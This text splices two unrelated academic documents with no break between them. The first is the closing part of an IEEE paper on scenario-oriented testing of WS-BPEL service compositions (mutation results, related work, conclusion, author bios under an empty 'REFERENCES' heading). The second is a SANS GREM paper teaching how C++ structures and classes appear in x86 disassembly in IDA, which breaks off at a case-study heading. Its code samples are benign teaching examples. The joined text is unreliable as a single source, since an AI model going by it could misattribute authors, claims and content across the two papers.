In the experiments, each testing technique (either our scenario-oriented technique or the random generation method) was used to generate four different test suites for each subject program, associating each test scenario with five, ten, twenty, and fifty test cases, respectively. In total, SmartShelf and SupplyChain have 12 and 2 test scenarios, respectively. Therefore, the four test suites for SmartShelf contain 60, 120, 240, and 600 test cases, respectively, while the suites for SupplyChain contain 10, 20, 40, and 100 test cases, respectively. In the rest of the paper, we use TS-60, TS-120, TS-240, and TS-600 to denote the test suites for SmartShelf, and TS-10, TS-20, TS-40, and TS-100 for SupplyChain. All test cases were used to test each mutant (except mutant #22 of SmartShelf, which is an equivalent mutant). The output of each mutant was compared with that of the base program, which, in this study, was regarded as a test oracle. The testing result (“pass” or “fail”) was recorded for the later calculation of FDR and MS.

1939-1374 (c) 2015 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.

5.7 Threats to Validity

The threat to internal validity mainly relates to the implementations of the two testing techniques (our scenario-oriented technique and the random testing method) under study. The programming work was conducted by several individuals and examined by different personnel. We are confident that the testing techniques were correctly implemented. The threat to external validity concerns the selection of subject programs. Though only two WS-BPEL service compositions were used in our experiment, they show consistent results (as observed in Section 6).
Having said that, we cannot claim that similar results will be exhibited on other service compositions. The threat to construct validity lies in the measurements used in this study. Mutation score has been popularly used in the context of mutation analysis for measuring the fault-detection effectiveness of testing techniques. The other metric, fault discovery rate, is also a natural and straightforward reflection of how effective a test suite is in detecting a certain fault. The most obvious threat to conclusion validity is that we only have a limited amount of experimental data. For each subject program, tens of mutants were constructed; for each testing technique, four test suites were generated. Though all the experimental results are consistent, we cannot guarantee that our conclusion is applicable in a more general sense.

6 Experimental Results

In this section, we report on the experimental results and answer the research questions posed in Section 5.1.

6.1 Results on SupplyChain

The values of FDR on the 11 mutants of SupplyChain are summarized in Figure 8 (the original experimental data are available in Appendix B). From Figure 8, we can observe that the test suites generated by our approach show different fault-detection effectiveness on different mutants, and the effectiveness also varies with suite size. Such observations are intuitively expected since, in the context of software testing, there does not exist a “golden” test suite that is effective in detecting every type of fault. For the fault types ACI, ASF, and ASI, our approach performs fairly consistently across suite sizes. However, for the fault types ERR and AIE, we observed that the effectiveness shows a large variation; in other words, it is relatively uncertain how effective our approach is in detecting these two types of faults. It is thus recommended that one pay close attention to ERR and AIE when designing and testing WS-BPEL programs.
In addition, our scenario-oriented technique outperforms random testing on some mutants, while random testing performs better on others. However, we can still observe that the FDR of the scenario-oriented technique has a lower variation than that of random testing; in other words, our scenario-oriented technique is more reliable than the random testing method. With regard to MS, all four test suites generated by the scenario-oriented technique achieve an MS of 100%, that is, they can kill all the mutants. On the contrary, random testing only achieves an MS of 90.9% (none of the four random test suites can kill mutant M3). Generally speaking, our scenario-oriented technique is more effective than random testing in detecting various faults.

6.2 Results on SmartShelf

The values of FDR on the 25 mutants of SmartShelf are summarized in Figure 9 (the original experimental data are available in Appendix B). Our observations based on Figure 9 are similar to those for SupplyChain: the fault-detection effectiveness varies with different mutants, different test suite sizes, and different testing techniques. Our approach delivers consistent effectiveness on the fault types ACI, ASF, and ASI. Nevertheless, the performance of our approach on the fault types ERR and AIE again shows a large variation, which implies that our approach is not stable on these types of faults, and thus close attention should be paid to them in testing. Moreover, the scenario-oriented technique is a more reliable method than random testing.

6.3 Answers to Research Questions

Based on the above experimental results and observations, we now answer the research questions:

1) Answer to RQ1 (Applicability): The proposed approach has been successfully employed to test two real-life WS-BPEL programs. Most steps of the proposed approach in the experiments have been automated by the prototype tool.
The proposed approach and prototype tool not only significantly reduce testing efforts, but also make on-the-fly and on-demand testing of WS-BPEL programs possible.

2) Answer to RQ2 (Fault-detection effectiveness): From the experimental results, the proposed scenario-oriented technique shows an MS of 100%, which indicates that the generated test suites can detect all seeded faults in both WS-BPEL programs; the proposed technique also shows a high FDR in most cases, which means that the generated test suites are very sensitive in detecting faults in WS-BPEL programs. Furthermore, our approach becomes more efficient with the aid of the tool.

3) Answer to RQ3 (Fault-detection effectiveness comparison): The experimental results show that our approach and random testing have a comparable FDR, while the former has a higher mutation score. In addition, the smaller variation in FDR compared with random testing implies that our approach is a more reliable testing technique for WS-BPEL programs.

7 RELATED WORK

WS-BPEL provides a mechanism to build flexible business processes by assembling loosely coupled Web services. Adequately and effectively testing WS-BPEL service compositions is necessary when they are used to execute mission-critical business processes. Some efforts have been reported on testing service compositions [3, 23]. We next describe several closely related studies on testing WS-BPEL service compositions.

WS-BPEL service compositions are a kind of concurrent program with SOA features. To test such concurrent programs, people usually turn to reachability analysis [31]. Fanjul et al. [15, 16] proposed a model-based approach to testing WS-BPEL processes. In their approach, the SPIN model checker is employed to generate the test suite for WS-BPEL programs, and a transition coverage criterion is employed to select test cases.
Since the approach needs to model all possible states of WS-BPEL specifications, it encounters the state-space explosion problem when service compositions are complex, and thus has limits in practice. Estero-Botaro et al. [10] proposed a test case generation framework for WS-BPEL programs. Their framework is based on a genetic algorithm that generates test suites for mutation testing. To maximize the mutation score of a test suite, the proposed genetic algorithm needs to execute the WS-BPEL programs under test many times, which is very time-consuming and thus not efficient. Unlike their approach, our approach uses adequacy criteria based on the structure of WS-BPEL programs together with constraint solving techniques.

Yuan et al. [37] proposed a graph-search-based test case generation method for WS-BPEL programs. In their approach, an extended control flow graph (ECFG) is defined to represent WS-BPEL programs, and the ECFG model is then traversed to generate concurrent test paths. Test data are generated using a constraint solving method. An XML schema is employed to represent test cases, which are abstract and thus not executable. No experiments are reported on the effectiveness of their approach. Similarly, Yan et al. [36] proposed an extended control flow graph (XCFG) to represent WS-BPEL programs, from which sequential test paths are generated. A constraint solver is employed to construct test cases for the generated paths. A case study is reported in which 14 sequential paths and 57 combined paths are generated, of which only 9 paths are feasible. For the above approaches, experimental results in terms of fault-detection capability are missing. Our approach is similar to these two approaches in that all of them generate test cases by means of the control flows of WS-BPEL programs.
Unlike the above approaches, our approach can generate executable test cases on demand, and its fault-detection capability is also reported by applying it to two real-life WS-BPEL programs.

Ni et al. [20] recently presented an approach to generating message sequences for testing WS-BPEL programs. Their approach first models the WS-BPEL program under test as a message-sequence graph (MSG), then generates message sequences based on the MSG, and finally generates test cases based on the MSG. Experiments were performed with six small WS-BPEL programs, and the fault-detection effectiveness of their approach was compared with that of other techniques. Our approach and theirs explore test case generation for WS-BPEL programs from different directions: the former starts from test scenarios, while the latter starts from message sequences. On the other hand, both test scenarios and message sequences actually represent a logical path through a BPEL program. Finally, it is not clear to what extent test case generation in their approach can be automated; our approach has been fully automated with the aid of the prototype tool, which is particularly desirable for the on-the-fly testing of BPEL programs.

Zhang et al. [38] proposed a model-based approach to generating test cases for WS-BPEL programs. The approach transforms Web service flows into UML 2.0 activity diagrams and then generates test cases from the activity diagram. This approach is very close to our previous work [26, 30, 39], in which we proposed a model-based approach to automatically generating a set of test scenarios for UML activity diagram programs. Unlike the above approaches, which generate abstract test cases from a formal or semiformal representation, the approach presented in this paper generates directly executable test cases and supports different concurrency coverage criteria when generating test scenarios.
Furthermore, we developed a prototype tool to automate the proposed approach and conducted case studies on two realistic WS-BPEL programs to show the effectiveness of the generated test scenarios and test suites.

8 CONCLUSION AND FUTURE WORK

In this paper, we presented a scenario-oriented testing approach to address the challenges of ensuring the quality of WS-BPEL service compositions. The approach first converts WS-BPEL programs into an abstract test model; test scenarios are then automatically generated from the model with respect to some coverage criteria, and test suites for the derived test scenarios can be obtained automatically. We developed a tool to automate our approach, and an empirical study was conducted to demonstrate how the approach can be applied to real-life service compositions. Experimental results validate the feasibility and effectiveness of the approach. Using our approach and the prototype, testers can effectively test WS-BPEL service compositions.

In the context of SOA, service compositions may face frequent changes, and concrete services are likely to be bound at runtime. Our approach caters nicely to the requirements of testing SOA software in that (1) it supports on-demand testing of WS-BPEL service compositions, (2) it significantly saves testing effort through the automatic generation of test cases, and (3) it can be adapted to run-time binding because it supports on-the-fly testing. In this sense, our approach does address the challenges caused by the unique features of SOA software.

In our current work, we have achieved the full automation of test case generation, which is a significant improvement over the preliminary study [28]. In future work, we will investigate how to automate the process of test result verification. Metamorphic testing [19] is a promising approach in this field, and we have conducted some studies on applying it to the testing of Web services [29].
It is worthwhile to combine the current work with these previous studies, with the purpose of automating the whole testing procedure for service compositions. It should be noted that our approach is not restricted to a specific platform: WS-BPEL was designed as a platform-independent language, which makes it possible for different organizations to interconnect their services. Though only two subject programs were used in our empirical study, this does not imply that our approach is only applicable to them. Having said that, larger-scale empirical studies on different platforms are still required to reinforce the applicability and effectiveness of our approach. In the future, we will include more diverse subject programs, and evaluate our approach on mutants that are automatically (instead of manually) generated by tools [13]. Moreover, it will be interesting to investigate whether and how our approach can be adjusted and extended to test other types of services (such as big data services) and service compositions (such as mashups). Since the main components of our approach, namely scenario-oriented testing, the Z3 constraint solver, etc., are general techniques rather than specific to WS-BPEL, such adjustment and extension should not be very difficult and would be a promising research direction.

ACKNOWLEDGEMENT

We thank Yan Shang from the University of Science and Technology Beijing for his help in the experiments reported in this paper, and Yunhui Zheng from Purdue University and Xiao He from the University of Science and Technology Beijing for their helpful suggestions on constraint solvers. This research is supported by the National Natural Science Foundation of China under Grant No. 61370061, the Beijing Municipal Training Program for Excellent Talents under Grant No. 2012D00906000002, and the Fundamental Research Funds for the Central Universities under Grant No. FRF-SD-12-015A.
REFERENCES

Chang-ai Sun is a Professor in the School of Computer and Communication Engineering, University of Science and Technology Beijing. Before that, he was an Assistant Professor at Beijing Jiaotong University, China, a postdoctoral fellow at the Swinburne University of Technology, Australia, and a postdoctoral fellow at the University of Groningen, The Netherlands. He received the bachelor's degree in Computer Science from Beihang University, China. His research interests include software testing, program analysis, and Service-Oriented Computing.

Yan Zhao is a master's student in the School of Computer and Communication Engineering, University of Science and Technology Beijing. She received a bachelor's degree in Computer Science from the same university. Her current research interests include software testing and Service-Oriented Computing.

Lin Pan is a master's student in the School of Computer and Communication Engineering, University of Science and Technology Beijing. He received a bachelor's degree in Computer Science from the same university. His current research interests include software testing and Service-Oriented Computing.

Huai Liu is a Research Fellow at the Australia-India Research Centre for Automation Software Engineering, RMIT University, Australia. He received the BEng in physioelectronic technology and the MEng in communications and information systems, both from Nankai University, China, and the PhD degree in software engineering from the Swinburne University of Technology, Australia. His current research interests include software testing, cloud computing, and end-user software engineering.

Tsong Yueh Chen is a Professor of Software Engineering in the Department of Computer Science and Software Engineering at Swinburne University of Technology. He received his PhD in Computer Science from The University of Melbourne, the MSc and DIC from Imperial College of Science and Technology, and the BSc and MPhil from The University of Hong Kong.
His current research interests include software testing and debugging, software maintenance, and software design.
Copyright SANS Institute. Author Retains Full Rights.

x86 Representation of Object Oriented Programming Concepts for Reverse Engineers

GIAC (GREM) Gold Certification

Author: Jason Batchelor, jxbatchelor@gmail.com
Advisor: Richard Carbone
Accepted: November 23, 2015

Abstract

Modern samples of malicious code often employ object oriented programming techniques in common languages like C++. Understanding how object oriented programming concepts, such as data structures, standard classes, and polymorphic classes, are represented in x86 assembly is an essential skill for the reverse engineer to meet today's challenges. The additional flexibility that object oriented concepts afford developers results in increasingly complex and unfamiliar binaries that are more difficult to understand for the uninitiated. Once proper understanding is applied, however, reversing C++ programs becomes less nebulous and following the flow of execution becomes more straightforward. This paper presents three custom-developed examples that demonstrate common object oriented paradigms seen in malicious code and performs an in-depth analysis of each. The objective is to provide insight into how C++ may be reverse engineered using the Interactive Disassembler software, more commonly known as IDA.

1. Introduction

While object oriented programming is generally understood by developers using higher-level languages, such as C++, the reverse engineer is required to understand how these concepts manifest themselves within a compiled binary. A reverse engineer operating on modern malware simply cannot afford to remain ignorant of data structures, standard classes, and polymorphic classes, as many of today's specimens invoke one or more of them.
The remainder of this paper will review some core concepts involving how one derives context from variables identified in x86 disassembly, as well as standard calling conventions. Subsequent sections will then focus specifically on the concepts of data structures, standard classes, and polymorphic classes. A discussion of each concept will be provided alongside a case study analysis. During each case study, comparisons will be made between the true source code and the x86 representation of a specific concept. While the provided source code serves to augment the discussion, the goal is to enable the reader to achieve the same results without its benefit. The exact compiler settings used for each of the provided case studies may be found in the Appendix.

1.1. Assumptions

The examples discussed herein were written in C++ using Microsoft Visual Studio 2010 and compiled on a 32-bit Windows operating system using the Intel x86 architecture. The Interactive Disassembler (IDA) software will be used to identify attributes of general object oriented concepts and derive conclusions on how they are represented within the compiled binary. It is important to note that all discussion within this paper is directly tied to the above criteria.

1.2. Core Concepts

The identification of structures, standard classes, and polymorphic classes within a binary file can be a complex task. By understanding how each of these concepts is represented at the lowest human-readable level of code, a key advantage is granted to the reverse engineer. With this understanding, the concept in question can oftentimes be defined as a structure with its member elements in IDA, and that structure can then be applied to the rest of the disassembled program. Doing so has far-reaching implications for the overall understanding of a program's core capabilities, and how it functions at run time.
Oftentimes, this has a domino effect on the overall reverse engineering effort and enriches the context a reverse engineer will be able to pass on to their customer.

To achieve an understanding of structured elements, one needs to be well versed in traditional programming constructs, such as pointers and integers. Programming languages like C aid in this pursuit, because many C constructs correspond, at a one-to-one ratio, to a single line of assembly (Lawlor, 2006). It is also important to understand how these types are used and represented in x86 assembly. The identification of data types relies on a solid understanding of assembly logic, which in itself contains the contextual clues necessary to inform the analysis. Table 1, below, provides a few examples of how the interpretation of basic assembly code can reveal deeper meaning. Consider the following examples in reference to the EAX register.

<table>
<thead>
<tr>
<th>Code</th>
<th>Purpose</th>
<th>EAX Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>lea eax, [edx+4]<br>add [eax], 5</td>
<td>Load the address edx+4 into EAX, then add five to the value it points to.</td>
<td>EAX is likely a pointer to an integer, or perhaps to another pointer.</td>
</tr>
<tr>
<td>mov eax, [ecx+0xc]<br>call eax</td>
<td>Call the dereferenced value of [ecx+0xc].</td>
<td>EAX is the address of a function.</td>
</tr>
<tr>
<td>mov eax, [ecx+0x4]<br>push [eax+0xc]<br>push [eax+8]<br>push [eax+4]<br>call [eax]</td>
<td>Load the address of the structure at [ecx+0x4] and push its member offsets onto the stack before calling a structure function.</td>
<td>EAX is a pointer to a structure containing a pointer to a function and that function's parameters.</td>
</tr>
</tbody>
</table>

Understanding the calling conventions being used within the decompiled binary is also
critical to deriving meaning from structured elements that are passed to member functions. Calling conventions are effectively a scheme, or standard, used by function callers (the subroutine doing the call) and callees (the subroutine being called) within a program. They primarily define how parameters are passed to called functions and how returned values are retrieved from them (Pollard, 2010). Four common calling conventions that reverse engineers need to be concerned with when considering C++ programming for Windows are cdecl, stdcall, fastcall, and thiscall (Trifunovic, 2001).

The cdecl convention is the default convention used by Microsoft for C and C++ programs (Microsoft, 2015). For this calling convention, arguments are passed from right to left and placed on the stack, and cleanup of the stack is done by the caller (Trifunovic, 2001). Integer or memory-address values returned from the callee are saved to the EAX register for the caller (Jönsson, 2005). Figure 1 illustrates this concept with appropriate annotations.

When considering API calls made using the Windows API, the stdcall convention is utilized. Stdcall arguments are likewise pushed onto the stack from right to left. In contrast to cdecl, stack maintenance responsibility falls to the function callee instead of the caller (Microsoft, 2015). Return values from functions are again passed via the EAX register (Jönsson, 2005). The annotations in Figure 2 depict a common stdcall routine.

Fastcall is a convention used to reduce the computational cost of calling a function. This is done primarily by placing the first two arguments of a function into registers (ECX and EDX under the Microsoft compiler). Remaining arguments are then placed on the stack from right to left. This makes function calls less expensive because operations done directly on register values are faster than those on the stack (Trifunovic, 2001).
The *thiscall* calling convention uses the callee to clean the stack and has function arguments pushed from right to left. With the Microsoft Visual C++ compiler, the 'this' pointer is passed in the *ECX* register rather than on the stack (Microsoft, 2015). It is important to note the *thiscall* convention has a different implementation under the GCC compiler, where it is very similar to *cdecl* except for the addition of the 'this' pointer, which is pushed onto the stack last (The Art Of Service, n.d.). For member functions that do not take a variable number of arguments, *thiscall* is used by default as the calling convention (Trifunovic, 2001). *Thiscall* cannot be specified explicitly; it is reserved for member functions that do not request a different convention and do not take a variable number of arguments (HackCraft, n.d.).

2. Discussion of Object Oriented Concepts and Case Studies

The following section focuses on three core concepts of object-oriented programming: data structures, standard classes, and polymorphic classes. Each concept discussed includes a brief review alongside a case study, with emphasis on deriving the context of member variables or functions. For each case study, the program is specifically written to demonstrate the topic being presented and deconstructed.

2.1. Data Structures

A data structure is merely a group of variables tied together under a single name defining the group. The name represents a structure type that denotes the beginning of the structure and is usually passed around as a pointer in memory. As an example of this, we have the following structure defined in Figure 3.

```c
struct InternetConnection
{
    HINTERNET Connect;
    HINTERNET OpenAddress;
    LPCTSTR Useragent;
    LPCTSTR Uri;
    char DataReceived[4096];
    DWORD NumberOfBytesRead;
    DWORD TotalNumberRead;
};
```

Figure 3: Example Structure Definition

The structure type would be defined as *InternetConnection*, and members of this structure type include an assortment of handles, C string pointers, a character array, and DWORD variables. Object names of type *InternetConnection* may be declared in two primary ways. They may show up at the end of the structure type declaration before the final semicolon, as seen in Figure 4.

```c
struct InternetConnection
{
    HINTERNET Connect;
    HINTERNET OpenAddress;
    LPCTSTR Useragent;
    LPCTSTR Uri;
    char DataReceived[4096];
    DWORD NumberOfBytesRead;
    DWORD TotalNumberRead;
} nhlDotCom, sansDotCom; // object declarations
```

*Figure 4: Example Structure with Declared Objects*

Alternatively, in Figure 5, they may also be instantiated separately within the code after the structure type has been declared. In this case, the struct keyword is optional in C++ (CPlusPlus, n.d.).

```c
InternetConnection nhlDotCom;
InternetConnection sansDotCom;
```

*Figure 5: Alternate Instantiation of Objects*

In x86, the member variables of a structure are usually retrieved by dereferencing incremental offsets from the start address of the object. To illustrate this concept from within a debugger, one can use OllyDbg while running a program that uses the structure type defined above. From the illustration in Figure 6, one can clearly see the address 0x3FEA68 being used as the start address of our object 'nhlDotCom.' Dereferencing the start address would give one the HINTERNET Connect variable. These handle values take up one DWORD, or 4 bytes of memory, as can be seen above. The LPCTSTR values are pointers to their string types and likewise take one DWORD of space. These member values need to be dereferenced in order to be accessed for their contents. Conversely, the DataReceived variable is a character array with a maximum size of 4,096 bytes. These bytes can be clearly seen in the address space in the above screenshot.
Finally, we have the last two DWORD values representing the number of bytes read and the total number of bytes read. It is important to remember endianness when interpreting these and all byte values on the heap. The final value for `TotalNumberRead`, while appearing visually to be `0xc6620100`, is actually `0x000162c6` (90,822 bytes) once endianness is considered.

At this point, a structure of type `InternetConnection` has been declared along with its member values, and analysis was performed on how such a structure is visually represented in the memory of a program that uses it. At the assembly level, to reference members of an `InternetConnection` object, we first need to pay special attention to the size of each variable and understand how much space it takes up on the heap. Doing so allows us to accurately compute each offset relative to the start of the `InternetConnection` object. Table 2 below represents how members of `InternetConnection` objects would be accessed in x86 assembly, assuming the register `ESI` holds the address of our `InternetConnection` object.

<table> <thead> <tr> <th>x86 Instruction</th> <th>InternetConnection Member</th> </tr> </thead> <tbody> <tr> <td>[esi]</td> <td>HINTERNET Connect</td> </tr> <tr> <td>[esi+4]</td> <td>HINTERNET OpenAddress</td> </tr> <tr> <td>[esi+8]</td> <td>LPCTSTR Useragent</td> </tr> <tr> <td>[esi+0xc]</td> <td>LPCTSTR Uri</td> </tr> <tr> <td>[esi+0x10]</td> <td>char DataReceived[4096]</td> </tr> <tr> <td>[esi+0x1010]</td> <td>DWORD NumberOfBytesRead</td> </tr> <tr> <td>[esi+0x1014]</td> <td>DWORD TotalNumberRead</td> </tr> </tbody> </table>

### 2.1.1. Structures in IDA

The IDA software enables analysts to create custom structures and incorporate them into the disassembled program. Using IDA Pro, one would complete the following steps in order to represent the structure type of `InternetConnection` and its members.

1. Select the structures tab and press the insert key.
2. Name the structure `InternetConnection`.
3. Use the 'd' data key after highlighting one's new structure to create member variables.
   a. One may continuously press the 'd' key to adjust the size to either a BYTE, WORD, or DWORD.
   b. Special sizes need to be specified by right clicking a BYTE sized representation of the member variable, selecting array, then typing the size.
4. Rename the structure and its members using the 'n' key, as one would any variable or subroutine from within IDA (Eagle, 2011).

After completing the steps above, one should have something similar to that depicted in Figure 7.

```
InternetConnection struc ; (size=0x1018)
    Connect dd ?
    OpenAddress dd ?
    UserAgent dd ?
    Uri dd ?
    DataReceived db 4096 dup(?)
    NumberOfBytesRead dd ?
    TotalNumberRead dd ?
InternetConnection ends
```

Figure 7: Completed IDA Structure

To apply the above structure to an object member of the matching type within IDA, right click on the member in IDA, scroll to structure offset, and select the matching structure type. The illustration below shows the application of the UserAgent and Uri structure members to a disassembled program that uses the InternetConnection structure type.

```
mov ecx, [ebp+InternetConnection_Object_1]
mov [ecx+InternetConnection.UserAgent], offset aMozilla5_0Wind ; "Mozilla/5.0 (Window
mov edx, [ebp+InternetConnection_Object_1]
mov [edx+InternetConnection.Uri], offset aHttpWWW_nhl_co ; "http://www.nhl.com"
```

Figure 8: Application of Structure in IDA

2.1.2. Case Study #1 – InternetConnection Structure Type

To further demonstrate the concept of data structures as they are encountered at the assembly level, a case study has been compiled that uses an InternetConnection object. The object is used as part of a program that reaches out to a remote server over an HTTP connection and computes the total number of bytes served up as a webpage to the client.
Each member variable of our structure is used as a part of this process, and the disassembled x86 code generated from IDA will be cross referenced with the higher level source code.

In Figure 9, the InternetConnection object is first instantiated and then passed as a variable to the GetHTML function, which returns the number of bytes downloaded to our printf statement.

```c
int main()
{
    InternetConnection conn; // object instantiation
    printf("Total downloaded %d bytes \n", GetHTML(conn)); // passing to GetHTML
    return 0;
}
```

Figure 9: Case Study Main Function

In the disassembly produced by IDA, the passing of the conn object appears as the following code in Figure 10.

```
lea eax, [ebp+var_1020]
push eax
call f_GetHTML
```

Figure 10: Passing of Conn Object in x86

Reviewing the above x86 code, at first glance, one would have no reason to believe that var_1020 is an object pointer to our structure. A closer look is now needed at how this is used from within the f_GetHTML function. Our first major hint is found as various structure elements are initialized.

```
mov eax, [ebp+arg_0]
mov dword ptr [eax+1014h], 0
```

Figure 11: Initialization of Structure Member

The illustration in Figure 11 depicts a variable at the 0x1014 offset from the start of the object being set to zero. In the first line, arg_0 represents the start address of our object in memory and is passed to EAX. The register is then used as a reference point to set member values. At this point, one can begin to infer that arg_0 is a pointer to an object whose type and members are presently unknown. As we continue to work our way forward, however, some of the relationships become obvious as plaintext strings are initially set to some of the structure members.
```cpp
int GetHTML(InternetConnection &conn)
{
    conn.TotalNumberRead = 0;
    conn.Useragent = "Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0 ";
    conn.Uri = "http://www.nhl.com";
    conn.Connect = InternetOpen(conn.Useragent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
}
```

From Figure 12, `arg_0` is passed to various register values, which ultimately serve as the starting point for our object. By reviewing the code depicted above, two strings representing a user agent and a URI are set to their respective offsets. Further validation for the user agent variable is given once one sees it pushed to the stack before the call to the API `InternetOpen`. After the call to `InternetOpenA` is made, one can see the returned `HINTERNET` handle stored in another member offset of our structure type. The source code at this point has a very similar flow of execution.

When another API call in the program is made to `InternetOpenUrlA`, one gets more validation concerning the `URI` string that was initialized earlier. In addition, one is able to identify one more member of our structure using the offset `[edx+4]`. The member variable is seen storing the `HINTERNET` handle for this call shortly after it is made in Figure 13.

It is worth noting at this point that for the user agent and URI variables seen initialized earlier in the disassembly, it was not immediately assumed the variables were used as such until it became clear in the code. Doing so would be a novice mistake, as malicious code authors often purposefully initialize variables to something seemingly benign as a simple means to obfuscate their true intent. It is therefore essential that the reverse engineer lets the code do the talking, and lets the true meaning of each variable reveal itself in how it is utilized. Once a call is made to InternetReadFile, one can gain two more definitions for the InternetConnection structure type.
However, the way the compiler represents the structure offsets is somewhat different than what we have previously observed. Instead of seeing the object offset referenced in open and close brackets, one sees the beginning of the object moved to a register, then an add operation immediately followed by a push to the API function InternetReadFile. The behavior can be observed on lines 1-3 and 5-7 of Figure 14 below.

Figure 13: Accessing Structure Members Before WinAPI Call

The usage of these members alongside the API call `InternetReadFile` also gives contextual insight into how they fit into the `InternetConnection` structure. The first example can be correlated back to the `lpdwNumberOfBytesRead` parameter, and the second can be tied directly back to the `lpBuffer` variable. Through MSDN, one can infer what these variables are used for, as well as how much space they take up within our structure. For example, one would know that `lpBuffer` is going to be populated with up to 0x1000 (4,096) bytes each time based on the `dwNumberOfBytesToRead` parameter.

The final structure member's usage becomes clear after the call to `InternetReadFile` is made. The x86 code enters a small block that seems to compute a summation based on the `InternetConnection` member attribute `NumberOfBytesRead`. The annotated x86 representation in Figure 15 illustrates this concept. The structure member '`NumberOfBytesRead`' is applied on the fourth line, based on the understanding of that value established in Figure 14. Doing so assists in deriving meaning for what is ultimately the `TotalNumberRead` structure member.
Figure 14: Contextual Insight into Structure Member Role

```
mov eax, [ebp+arg_0]    ; pass object pointer to eax
mov ecx, [eax+1014h]    ; retrieve value at 0x1014 offset
mov edx, [ebp+arg_0]    ; pass object pointer to edx
add ecx, [edx+InternetConnection.NumberOfBytesRead]
mov [edx+1014h], ecx    ; store summation result at 0x1014 offset
jmp short loc_401081
```

Figure 15: Annotated Usage of Structure Member

2.2. Standard Classes

Classes themselves are merely an expanded concept of data structures. The primary difference between a class and a plain data structure is that a class can contain functions as well as member variables (CPlusPlus, n.d.). Compiled code that uses classes can sometimes lose its 'class' identity if the compiler has better ideas about how the code should be interpreted. This is true of all written code, which is open to interpretation by the compiler and often put through a gauntlet of optimizations. The provided case study examines this phenomenon as it applies to standard classes in greater detail.

2.2.1. Case Study #2 – Square Class to Calculate Area

In order to demonstrate how classes may be represented at the assembly level, a sample proof of concept program was created using a class named 'Square.' The class contains two variables and two functions that utilize them. The program simply initializes an object of type Square, computes the area, then exits after printing. Source code of the Square class is illustrated in Figure 16.

```cpp
#include <iostream>
using namespace std;

class Square
{
    int width, height;
public:
    void set_values(int, int);
    int area() { return width*height; }
};

void Square::set_values (int x, int y)
{
    width = x;
    height = y;
}
```

Figure 16: Source Code of Square Class

When a *Square* object is declared, the memory contents that represent the object will not match what one might consider to be a *Square* object when looking at the source code.
In fact, when reviewing the memory contents of what should be the Square object, one is met with only two variables after it is initialized, both of which are depicted in Figure 17 as 4-byte width and height values.

![Figure 17: Heap of Square Object](image)

So, where are the additional function pointers to the 'set_values' and 'area' subroutines? The compiler, in this case, chose not to use them that way. Compiler settings and their underlying logic can change the execution flow of a program dramatically. Optimizing for size or speed can greatly impact how defined classes are interpreted, and will ultimately change how a disassembled program is logically represented versus the original source code. This has an amplifying effect when considering byte-pattern-based signatures for detecting malware, and it is a simplistic evasion technique employed by malware authors. While the intricacies of compiler theory are far beyond the scope of this paper, they are nonetheless worth mentioning.

Considering the compiler's intentions and the resulting disassembled code, it is fair to say the 'class' is treated like a 'structure,' insofar as its memory layout, like the example structure, does not contain any pointers to class functions. The class functions used by *Square* are called as if they are separate elements in Figure 18. Further exploration of each of these functions is necessary to understand the purpose of the two member variables in the absence of original source code.

When the object is defined, a call to its set_values method is made. In the main function, the source and disassembly seem very similar; however, within the x86 example one sees the address of a variable being loaded into the ECX register, which demonstrates the thiscall convention. Observing this behavior also implies this object may be global in scope (Sabanal & Yason, 2007).
Without the benefit of source code, it should be clear that the function being traced into takes two arguments and will likely make use of the 'this' pointer contained in ECX at some point.

```
sub_401020 proc near
var_4= dword ptr -4
arg_0= dword ptr 8
arg_4= dword ptr 0Ch

push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx ; pointer to object
mov eax, [ebp+var_4] ; eax = object pointer
mov ecx, [ebp+arg_0] ; arg0, previously pushed int type
mov [eax], ecx ; set integer to dereferenced object field
mov edx, [ebp+var_4] ; pointer to object
mov eax, [ebp+arg_4] ; arg4, previously pushed int type
mov [edx+4], eax ; set integer to dereferenced object field
mov esp, ebp
pop ebp
ret 8
sub_401020 endp
```

When tracing into the `sub_401020` function from Figure 19, the two integer arguments are set within the passed object at predefined offsets. The 'this' pointer is moved into `EAX` and `EDX` from `var_4`, after `var_4` is filled from `ECX`, which the function caller set to the initial object pointer. Both `EAX` and `EDX` are dereferenced in order to populate the object with its member values. At this point, it should be clear that the main purpose of this subroutine is to initialize the object.

When tracing back to the original function caller in Figure 20, one sees the 'this' pointer passed again via `ECX`. The function `sub_401000` takes zero stack arguments but likely does something with the previously initialized object. While these inferences inform analysis and gauge expectations, letting the code tell the real story is extremely important.

```assembly
lea ecx, [ebp+var_8] ; pointer to our object
call sub_401000
```

Figure 20: Stepping into Function Using Object

Upon stepping into this function, one can clearly see it load the 'this' pointer from the `ECX` register into a local function variable. From there, the same pointer is used to populate the `EAX` and `ECX` registers.
The move from `var_4` back into `ECX` is redundant, and it should be noted here that the example assembly was compiled with no optimizations to help better illustrate what is going on.

```assembly
sub_401000 proc near
var_4= dword ptr -4

push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx ; pointer to object moved from ecx
mov eax, [ebp+var_4] ; pointer moved to eax
mov ecx, [ebp+var_4] ; pointer moved back to ecx
mov eax, [eax] ; eax dereferenced and stored
imul eax, [ecx+4] ; eax is multiplied with dereferenced object integer
mov esp, ebp
pop ebp
ret
sub_401000 endp
```

Figure 21: Computation Performed Using Structure Members

The object pointers are both dereferenced and used in a multiplication operation to retrieve the calculated area in Figure 21. Even if one did not have the benefit of knowing from previous analysis what the member value types of the object were, observing the `imul` (integer multiplication) operation would be enough to tell us they are integers. The result is stored in `EAX`, and when the function returns, that value is pushed to `printf` in order to display the result to the end user.

```
push eax
push offset aAreaD ; "Area: %d"
call ds:printf
```

Figure 22: Final Print of Previously Computed Result

### 2.3. Polymorphic Classes

The concept of polymorphism is a powerful way to extend a class from its base and still be type compatible. Concepts such as class inheritance are fundamental to polymorphism, because derived classes inherit their base member attributes. In this way, a derived class can leverage base class attributes in its own internal functions (CPlusPlus, n.d.). Virtual functions are a related concept, in that they extend functions to derived classes in a similar fashion to how base member variables are extended. Calls to virtual functions are resolved dynamically, and therefore use of the 'this' pointer is expected (Skochinsky, 2011).
The case study presented in the next section goes over this concept and how it may be encountered at the assembly level.

#### 2.3.1. Case Study #3 – Finding the Magic Numbers For Each Shape

